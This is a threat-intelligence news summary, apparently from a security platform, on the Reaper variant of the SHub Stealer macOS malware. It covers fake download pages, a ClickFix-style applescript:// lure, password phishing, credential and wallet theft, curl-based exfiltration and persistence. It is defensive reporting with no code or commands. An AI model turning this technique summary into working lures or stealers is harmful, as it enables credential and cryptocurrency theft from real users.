Researchers reported a macOS malware campaign distributing an updated SHub Stealer variant, dubbed Reaper, through fake download pages impersonating trusted software such as WeChat and Miro. The infection chain uses an automated ClickFix-style technique that avoids Terminal paste protections in macOS by opening the built-in Script Editor through an applescript:// link with malicious code already loaded, requiring only a single user action to run. The malware then presents a fake Apple security update prompt to capture the victim’s password while using typo-squatted domains and brand impersonation to make the attack appear legitimate.
Once executed, Reaper steals documents, browser credentials from Chrome, Firefox, Brave, Edge, and Opera, along with Keychain and iCloud-related data, Telegram sessions, and cryptocurrency wallet information. It exfiltrates files in chunked ZIP archives to attacker-controlled infrastructure, including via curl, modifies legitimate desktop crypto wallet applications to redirect future funds, and establishes persistence through a fake Google Software Update service. Researchers also said the malware checks for a Russian keyboard layout and exits if detected, and noted that this is the third observed automated ClickFix-style macOS campaign in less than two months, indicating the technique is gaining traction among macOS threat actors.

Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
1 event from the most recent confirmed update back to the earliest known activity.
Researchers at Moonlock reported a macOS malware campaign distributing an updated SHub Stealer variant called Reaper through fake software download pages impersonating brands such as WeChat and Miro. The campaign uses an automated ClickFix-style infection chain that opens Script Editor with preloaded malicious code, then steals browser data, documents, passwords, and cryptocurrency wallet information while establishing persistence.
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
2 references tracked. Mallory keeps watching after this page renders.
cybersecuritynews.com
Open sourcehackread.com
Open sourceMap indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.